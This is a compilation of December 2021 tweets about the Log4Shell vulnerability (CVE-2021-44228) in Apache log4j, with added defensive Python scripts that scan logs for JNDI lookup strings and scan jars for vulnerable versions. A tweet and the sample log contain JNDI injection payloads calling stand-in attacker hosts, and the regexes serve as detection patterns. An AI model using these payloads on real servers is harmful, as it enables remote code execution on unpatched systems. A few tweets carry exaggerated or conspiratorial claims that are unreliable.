Remote code execution vulnerability found in the Apache log4j Java logging library (several services affected, including Steam, iCloud and Minecraft)
— lunamoth (@lunamoth) December 11, 2021
Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package | LunaSec https://t.co/q34d4Lz3HC
⚠️ New #0-day vulnerability tracked under "Log4Shell" and CVE-2021-44228 discovered in Apache Log4j ‼️ We are observing attacks in our honeypot infrastructure coming from the TOR network. Find mitigation instructions here: https://t.co/tUKJSn8RPF pic.twitter.com/WkAn911rZX
— Deutsche Telekom CERT (@DTCERT) December 10, 2021
If you're running a server with #Log4J, please add the following JVM argument to your command line immediately to protect against a 0-day exploit.
— Bruno Borges (@brunoborges) December 10, 2021
-Dlog4j2.formatMsgNoLookups=true https://t.co/MWYhEdnS0r #Java #Security #Infosec
We wrote up a summary on the log4j 0-day that was found earlier today. This is going to be fun for a lot of people scrambling to patch this tonight! https://t.co/Dqmt5Iqsg4
— Free Qaz (@freeqaz) December 10, 2021
Remote code execution in log4j. Java. This library is in broad use. This might be security-ugly in many corporate settings. "services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable" https://t.co/ks4IvbVLmE https://t.co/qylCnADbgY pic.twitter.com/EOsVL4QcXE
— Lukasz Olejnik (@lukOlejnik) December 10, 2021
Resources for Log4j vuln. Reply here with more.
— Frank McGovern (@FrankMcG) December 10, 2021
- Overview by @LunaSecIO: https://t.co/4oMCSkvUKd
- Vulnerable Hashes by @mubix: https://t.co/u0yGrCIts2
- IPs Exploiting by @GreyNoiseIO: https://t.co/9z8N9wK4j4
- Detection Rules by @cyb3rops: https://t.co/io52zB6JHB
CVE 2021-44228: Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package
— Cyber Advising (@cyber_advising) December 11, 2021
Affected Apache log4j2 Versions 2.0 <= Apache log4j <= 2.14.1
PoC: https://t.co/0pkB9hFHDl pic.twitter.com/bfK2YUjjJ2
If you read about the recent Log4shell security exploit that may affect some Java apps, worth noting that both Nextflow and Nextflow Tower do *not* use the Log4j logging library causing this problem. All safe. Have a nice weekend! https://t.co/fzbeLSvMQQ
— paoloditommaso (@PaoloDiTommaso) December 11, 2021
Before I knew it, this had been given the name "Log4Shell".
— とある診断員 (@tigerszk) December 11, 2021
RCE 0-day exploit found in log4j2, a popular Java logging package https://t.co/cNzQ5i6kBU
A few hours ago, a 0-day RCE exploit was discovered in the logging library log4j. You may not have heard of it, but it's everywhere.
— Malwarebytes (@Malwarebytes) December 10, 2021
Per @LunaSecIO: "Many, many services are vulnerable".
They include Steam, Apple iCloud, Minecraft, and others. https://t.co/QavDOnDUCp
Let me save you a bunch of clicks:
— Catalin Cimpanu (@campuscodi) December 10, 2021
PoC: https://t.co/yShp4iRTxJ
Patch: https://t.co/rVSq2EZfoT
Technical breakdown: https://t.co/QWRkh6rk4y
Systems confirmed vulnerable: https://t.co/Fe2K7vwcV2 pic.twitter.com/9YlNzB1uEF
So. I hope you all went and checked your java applications for the log4j vulnerability this morning, right?
— Geoffroy Couprie (@gcouprie) December 10, 2021
If not:
- do it, it's a bad one https://t.co/93TXh8bMlV
- there are minecraft servers with a better security posture than your enterprise, and I am judging you for that
Go Check ➡️ https://t.co/psud1GpTys for callbacks.
— Frooti (@HackerGautam) December 11, 2021
References: https://t.co/iGStqofHn6
Log4j Attack Surface: https://t.co/C6WQ0KjgHf
- Log4j Dependencies Repos: https://t.co/ilQQCXAlt2 #log4jRCE #log4j #Log4Shell #infosec @shifacyclewala
“Unless it is fixed, it grants criminals, spies and programming novices alike easy access to internal networks where they can loot valuable data, plant malware, erase crucial information and much more.” https://t.co/94HQYQ6HHd
— The Grey Man (@IntelOperator) December 11, 2021
Bad actors have been quick to exploit one of the worst computer vulnerabilities discovered in years, say experts who have been scrambling to fix a flaw in an open-source code that's widely used in cloud services. https://t.co/ahow9GAxeq
— NPR (@NPR) December 11, 2021
$ASTA @astra_veda_ @ParanotekLLC @sayphr
— Brian Walton (@BrianWalton78) December 11, 2021
“The internet’s on fire right now,” senior vice-president of intelligence at the cybersecurity firm Crowdstrike.
“I’d be hard-pressed to think of a company that’s not at risk.” #CyberSecurity #QuantumComputing https://t.co/ARDSOAq9sM
Recently uncovered software flaw ‘most critical vulnerability of the last decade’ https://t.co/jjwnpjXTwc @Msmariablack for interest
— 2024WonderWomanOnTarget (@EdnaKB2) December 11, 2021
Given the UK govt's desire to accumulate data on its citizens, and the recent data breaches/loss/ and donations to US healthcare etc...
— Proof in the Putting (@HereBeProof) December 11, 2021
this is worrying! https://t.co/pIP3nXkhMY @StillShielding @LizWebsterLD @jneill @VesperUK @HealthFirstAK @HuguenotHouse @fish_in_a_hat
Network vulnerability dubbed "possibly the biggest in the history of modern computing" already being weaponized. #cybersecurity
— Timothy Peterson (@nsquaredcrypto) December 11, 2021
TLDR: Allows network access with no password; all computers everywhere at risk. Patches being developed but are app-specific. https://t.co/a7sHXbMRyP
For my security friends : could this have been caused by https://t.co/3UgvOHFcHI ? (10/)
— (@henkvaness) December 11, 2021
“The vulnerability was first discovered on Minecraft and thought to involve only the gaming platform but quick exploration revealed that the vulnerability potentially affects any software using this library.” https://t.co/lOxY1BWzZV
— The Grey Man (@IntelOperator) December 11, 2021
My non-techy explainer went up an hour ago: https://t.co/lMScLfP0Ng
— Nicholas Weaver (@ncweaver) December 10, 2021
What started as a Minecraft prank has turned into a nightmare. @ncweaver takes us down the winding road to explain Log4Shell: https://t.co/vLr5weg5yq
— Lawfare (@lawfareblog) December 10, 2021
What's the Deal with the Log4Shell Security Nightmare? https://t.co/pd2e1XPshG #opensource
— Free Open Source Software and Linux (@FOSS_Linux) December 11, 2021
My writeup for non-techies: https://t.co/lMScLfP0Ng
— Nicholas Weaver (@ncweaver) December 11, 2021
I should be doing productive things like working on finals, but instead I spent much of the morning writing up a non-technical explainer about log4shell for @lawfareblog https://t.co/lMScLfP0Ng
— Nicholas Weaver (@ncweaver) December 10, 2021
Log4Shell shows yet again that clouds are full of parsers, and that any input is a program #LangSec [https://t.co/iJZStjEz3o]
— sergey bratus (@sergeybratus) December 11, 2021
Let me know if you have any issues - further QA pending. Background info here: https://t.co/ICXvMnwIjn
— James Kettle (@albinowax) December 10, 2021
https://t.co/KTyqTFUoOg
— yhara (Yutaka HARA) (@yhara) December 10, 2021
- When you do something like info("Request User Agent:" + userAgent), tampering with the UA lets you execute info("...${jndi:ldap://attacker.com/a}") ← I get that
- At that point, an access to https://t.co/zY3tVowZrS occurs ← I sort of get that
- When the attacker returns a class file, it gets executed ← why?
This is pretty bad. So it works just by putting an expression that requests a JNDI lookup against an LDAP address into a string that gets logged. If a web app or the like has any place that logs a string sent from outside, is it game over? https://t.co/tMcSiDFKyl
— AOE Takashi (@aoetk) December 10, 2021
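The mechanism in the two tweets above (a user-controlled string such as a User-Agent containing `${jndi:ldap://...}` is logged and triggers the lookup) also gives defenders a simple hunting signal: that string shows up verbatim in access and application logs. The following is an added example, not code from any of the tweet authors. It scans log lines for JNDI lookup expressions, extracts the callback host for blocking or IoC matching, and separately flags any other `${...}` lookup arriving in client-supplied fields, since real browsers never send those. The sample log lines and the host `attacker.example` are constructed for the demo.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# A JNDI lookup as it appears inside a logged string, e.g. the
# "${jndi:ldap://host:1389/a}" User-Agent described in the tweets above.
# Scheme and host are captured so responders can block the callback target.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:\s*/{0,2}(?P<host>[^/:}\s]+)",
    re.IGNORECASE,
)
# Any Log4j-style lookup expression at all. Real clients do not send these,
# so one arriving in user-controlled input deserves a look even when it is
# not directly recognisable as a JNDI lookup.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")


@dataclass
class Finding:
    line_no: int
    reason: str            # "jndi lookup" or "lookup expression"
    scheme: Optional[str]  # e.g. "ldap"; None for generic lookups
    host: Optional[str]    # callback host; None for generic lookups
    line: str


def scan_line(line_no: int, line: str) -> Optional[Finding]:
    """Classify one log line; returns None when nothing lookup-like is present."""
    m = JNDI_RE.search(line)
    if m:
        return Finding(line_no, "jndi lookup", m.group("scheme").lower(), m.group("host"), line)
    if LOOKUP_RE.search(line):
        return Finding(line_no, "lookup expression", None, None, line)
    return None


def scan_log(text: str) -> List[Finding]:
    """Run scan_line over every line of a log file's text, keeping only hits."""
    hits = (scan_line(n, ln) for n, ln in enumerate(text.splitlines(), start=1))
    return [f for f in hits if f is not None]


def callback_hosts(findings: List[Finding]) -> List[str]:
    """Distinct callback hosts seen in JNDI lookups, for blocking or IoC matching."""
    return sorted({f.host for f in findings if f.host})


# Constructed sample access log (not real traffic). Line 2 carries the
# User-Agent pattern from the tweets; "attacker.example" is a placeholder host.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 988 "-" "${jndi:ldap://attacker.example:1389/a}"
10.0.0.9 - - [10/Dec/2021:14:02:19 +0000] "GET /api HTTP/1.1" 404 12 "-" "${date:yyyy}"
10.0.0.7 - - [10/Dec/2021:14:03:01 +0000] "GET /static/app.js HTTP/1.1" 200 4410 "-" "curl/7.79.1"
"""

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"line {f.line_no}: {f.reason} scheme={f.scheme} host={f.host}")
    print("callback hosts:", callback_hosts(found))
```

Because the string has to reach Log4j to do any harm, the same scan is worth running over every log the application writes, not only the web server access log; any field that is echoed into a log message (headers, usernames, form values) is a candidate.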
This bug is far worse than I expected. It is beyond imagination. https://t.co/RB3iq96Xtk
— Rui Ueyama (@rui314) December 10, 2021
News that a vulnerability has been found in log4j, a logging library widely used in Java, that makes it extremely easy to trigger RCE (Remote Code Execution)
— 結城浩 (@hyuki) December 10, 2021
* * *
RCE 0-day exploit found in log4j, a popular Java logging package | LunaSec https://t.co/yBeqYTwyAT
Hi Philip, see the following line: https://t.co/GhbYLtS97I
— Maximiliano Soler (@MaxiSoler) December 10, 2021
It's calling a Burp Collaborator payload, if you receive the pingback from the server it could be vulnerable.
See the following steps: https://t.co/JY6TTEY1wv
#log4j CVE-2021-44228 #0day
— rudi ;-) (@eMbeddedHome) December 12, 2021
ℹ️ https://t.co/FGqZ0aZNxg #Affected
- #CADENCE SPB_XX PCBDW
- #86DUINO
...
ℹ️ Log4j is a popular logging library for Java applications. #VulnerabilityCheckScript
ℹ️ https://t.co/gGBYC3aCFb #PoC Remote Code Execution https://t.co/R45SPuci67
Looks like the #log4j2 0-day vulnerability will keep SysAdmins busy next week and #DFIR people busy for a few months. Prepare yourself for #ransomware threat actors to start using it in about a week.
— Josh Lemon (@joshlemon) December 11, 2021
Here's a good write up on the technical details: https://t.co/9ph4MlyJ5a
For versions earlier than that, it can be handled by rewriting the log output pattern. Replacing JndiLookup with an empty implementation also works. https://t.co/X23CEuNhFd
— t_yano (@t_yano) December 11, 2021
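The tweet above points at the class-level mitigation (neutralising JndiLookup), and an earlier tweet gives the affected range 2.0 <= log4j <= 2.14.1. Verifying either across a fleet means finding every log4j-core copy, including ones buried inside fat jars and WAR files, and checking its version and whether JndiLookup.class is still present. The following scanner is an added example, not code from any of the tweet authors; it reads the Maven pom.properties that log4j-core ships under META-INF for the version, recurses into nested archives, and builds a constructed WAR in memory so it runs offline. It deliberately does not judge the `-Dlog4j2.formatMsgNoLookups=true` JVM flag from the earlier tweet, since that is a runtime setting invisible in the jar (and one that only exists from Log4j 2.10 onward).

```python
import io
import os
import re
import zipfile
from typing import Dict, List

# Paths inside a log4j-core jar. The class-removal mitigation deletes exactly
# JNDI_LOOKUP_CLASS; POM_PROPS carries the artifact version.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED_ARCHIVES = (".jar", ".war", ".ear", ".zip")
AFFECTED_MIN, AFFECTED_MAX = (2, 0), (2, 14, 1)  # range quoted in the tweets above


def parse_version(v: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); a qualifier such as '-beta9' is dropped."""
    return tuple(int(n) for n in re.findall(r"\d+", v.split("-")[0]))


def inspect_archive(data: bytes, path: str) -> List[Dict]:
    """Find every log4j-core inside an archive, recursing into nested jars/wars."""
    results = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_LOOKUP_CLASS in names:
            version = None
            if POM_PROPS in names:
                for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                    if line.startswith("version="):
                        version = line.split("=", 1)[1].strip()
            results.append({"path": path, "version": version,
                            "jndi_lookup_present": JNDI_LOOKUP_CLASS in names})
        for name in sorted(names):
            if name.lower().endswith(NESTED_ARCHIVES):
                results.extend(inspect_archive(zf.read(name), f"{path}!/{name}"))
    return results


def assess(entry: Dict) -> str:
    """Turn one inventory entry into a triage verdict."""
    if not entry["jndi_lookup_present"]:
        return "mitigated: JndiLookup class removed"
    if entry["version"] is None:
        return "review: JndiLookup present, version unknown"
    if AFFECTED_MIN <= parse_version(entry["version"]) <= AFFECTED_MAX:
        return "vulnerable: CVE-2021-44228 (JndiLookup present, affected version)"
    return "outside the listed affected range"


def scan_directory(root: str) -> List[Dict]:
    """Walk a directory tree and inspect every archive found (for real hosts)."""
    results = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(NESTED_ARCHIVES):
                full = os.path.join(dirpath, fn)
                with open(full, "rb") as fh:
                    try:
                        results.extend(inspect_archive(fh.read(), full))
                    except zipfile.BadZipFile:
                        pass  # not a real zip; skip it
    return results


def _build_archive(entries: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_war() -> bytes:
    """Constructed WAR for the demo: one untouched log4j-core 2.14.1 and one
    with JndiLookup.class deleted. The class bodies are dummy bytes."""
    untouched = _build_archive({POM_PROPS: b"version=2.14.1\n",
                                JNDI_LOOKUP_CLASS: b"\xca\xfe\xba\xbe"})
    stripped = _build_archive({POM_PROPS: b"version=2.14.1\n"})
    return _build_archive({
        "WEB-INF/lib/log4j-core-2.14.1.jar": untouched,
        "WEB-INF/lib/log4j-core-stripped.jar": stripped,
        "WEB-INF/classes/App.class": b"",
    })


if __name__ == "__main__":
    for entry in inspect_archive(build_sample_war(), "app.war"):
        print(f"{entry['path']}: version={entry['version']} -> {assess(entry)}")
```

On a real host, call `scan_directory("/opt/apps")` (or wherever deployments live) and act on every "vulnerable" or "review" verdict; a "review" entry with no pom.properties is typically a shaded or repackaged copy, which is exactly the kind a version-only check misses.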
It's going to be an interesting week. Just on the heels of their financial system war games last week and Klaus Schwab's ever prescient predictions of the apocalypse. More coincidence theory. https://t.co/upZdaXK5wl
— jonniegg (@jonniegg) December 12, 2021
Recently uncovered software flaw ‘most critical vulnerability of the last decade’
— The Cybersecurity Club (@TCybersecurityC) December 11, 2021
Read more: https://t.co/6Asx3gmpIr #thecybersecurityclub #cybersecurity #malware #minecraft #programming #ransomeware #technology #log4shell #thegurdian pic.twitter.com/2SqgGDimPm
“A critical vulnerability in a widely used software tool – one quickly exploited in the online game Minecraft – is rapidly emerging as a major threat to organizations around the world.” https://t.co/nC42actnRr
— Adam Levin (@Adam_K_Levin) December 11, 2021
Well done piece in @lawfareblog on the log4j vuln. I wonder if this vuln had been pre-reported to authorities under the Reg that went into effect Sept 1 before it was released publicly. https://t.co/P6QymY4Qe9
— Cristin Goodwin (@CristinGoodwin) December 11, 2021